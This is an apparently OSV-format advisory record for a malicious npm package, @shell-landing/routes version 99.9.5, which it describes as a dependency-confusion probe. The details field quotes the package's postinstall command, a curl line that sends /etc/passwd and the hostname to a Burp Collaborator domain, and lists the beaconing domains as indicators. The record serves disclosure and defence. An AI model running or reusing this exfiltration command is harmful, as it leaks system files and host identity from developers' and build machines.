{"id":"MAL-2026-5429","summary":"Malicious code in @shell-landing/routes (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577)\nOn `npm install`, the package's postinstall hook runs `node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`. The curl invocation POSTs the contents of `/etc/passwd` to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and beacons each as an HTTP GET subdomain of `*.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the `@shell-landing` scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running `npm install` will leak host identity and `/etc/passwd` to attacker infrastructure.\n","modified":"2026-06-09T18:01:32.742969114Z","published":"2026-06-09T17:19:00Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-09T17:19:00Z","import_time":"2026-06-09T17:45:49.873904036Z","versions":["99.9.5"],"source":"amazon-inspector","id":"IN-MAL-2026-005027","sha256":"6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577"},{"modified_time":"2026-06-09T17:19:01Z","import_time":"2026-06-09T17:45:49.905899507Z","versions":["99.9.5"],"source":"amazon-inspector","id":"IN-MAL-2026-005028","sha256":"75491d01c9adcd8b4ea3535f0aed57f3763c03e1375e84b1a20cec842ae6d5b2"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@shell-landing/routes/v/99.9.5"}],"affected":[{"package":{"name":"@shell-landing/routes","ecosystem":"npm","purl":"pkg:npm/%40shell-landing%2Froutes"},"versions":["99.9.5"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"sha256":"b16d6e964a35304d2c3ab4c01fc722bd45b49c36a61c9282364719a236a8e741","path":"package.json","tlsh":"74d0a7b07800c6737acd06a38128a1457955c85b1214b96246df87e4912436174e6506"},{"sha256":"9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9","path":"scripts/scream3gg.js","tlsh":"74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-hjqjPpc4nwEToGMYjs7AgvTToo5ElKYbb4ne8S18NSfwJ7rg5BUMEll/iYjPncsCnh844HTikoYzowfp0hCqlA==","sha1":"f369c3ef9e1f43b4f9bcaa6f25e011336d8af992"},"filename":"routes-99.9.5.tgz"}],"domains":["7363616e2d353265363663323431616637.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com","7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}